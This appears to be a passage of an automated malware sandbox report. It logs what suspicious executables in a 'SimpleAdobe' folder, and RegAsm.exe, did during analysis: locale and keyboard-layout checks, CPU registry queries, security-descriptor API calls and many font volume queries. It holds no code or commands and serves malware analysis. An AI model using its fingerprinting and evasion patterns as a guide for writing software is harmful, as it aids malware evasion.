Code function: 12_2_65AD4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

12_2_65AD4760

Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe

Code function: 5_2_00443A57 cpuid

5_2_00443A57

Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe	Code function: GetLocaleInfoA,	11_2_0040515C
Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe	Code function: GetLocaleInfoA,	11_2_004051A8
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	12_2_00414570

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Queries volume information: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Queries volume information: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Queries volume information: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Queries volume information: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
